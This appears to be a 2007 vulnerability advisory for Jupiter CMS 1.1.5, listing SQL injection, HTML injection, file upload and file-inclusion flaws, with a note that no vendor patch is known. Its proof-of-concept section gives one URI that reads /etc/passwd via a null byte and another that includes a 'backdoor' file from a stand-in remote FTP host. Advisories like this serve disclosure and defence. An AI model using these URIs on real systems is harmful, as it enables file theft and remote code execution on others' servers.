BID:22560

Jupiter CMS Multiple Scripts Multiple Input Validation Vulnerabilities

Info

Jupiter CMS Multiple Scripts Multiple Input Validation Vulnerabilities

Bugtraq ID:	22560
Class:	Input Validation Error
CVE:	CVE-2007-0972 CVE-2007-0986 CVE-2007-0987 CVE-2007-0971
Remote:	Yes
Local:	No
Published:	Feb 14 2007 12:00AM
Updated:	Jul 06 2016 02:40PM
Credit:	DarkFig is been credited with the discovery of these vulnerabilities.
Vulnerable:	Jupiter CMS Jupiter CMS 1.1.5

Not Vulnerable:

Discussion

Jupiter CMS Multiple Scripts Multiple Input Validation Vulnerabilities

Jupiter CMS is prone to multiple input-validation vulnerabilities, including SQL-injection, HTML-injection, arbitrary file-upload issues, and remote/local file-include vulnerabilities, because the application fails to sanitize user-supplied input.

A successful exploit of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, exploit vulnerabilities in the underlying database implementation, and execute arbitrary code within the webserver process. Other attacks are also possible.

Version 1.1.5 is vulnerable; other versions may also be affected.

Exploit / POC

Jupiter CMS Multiple Scripts Multiple Input Validation Vulnerabilities

Attackers can exploit these issues via a web client:

The following proof-of-concept URIs are available:

http://www.example/<path>/index.php?n=/etc/passwd%00
http://www.example/<path>/index.php?n=ftp://user:[email protected]/backdoor

/data/vulnerabilities/exploits/22560-POC1.php
/data/vulnerabilities/exploits/22560-POC2.php
/data/vulnerabilities/exploits/22560-POC3.php

Solution / Fix

Jupiter CMS Multiple Scripts Multiple Input Validation Vulnerabilities

Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].

References

Jupiter CMS Multiple Scripts Multiple Input Validation Vulnerabilities

References:

Jupiter Homepage (Jupiterportal.com)
Jupiter CMS 1.1.5 Multiple Vulnerabilities (DarkFig)
Re: Jupiter CMS 1.1.5 Multiple Vulnerabilities (DarkFig)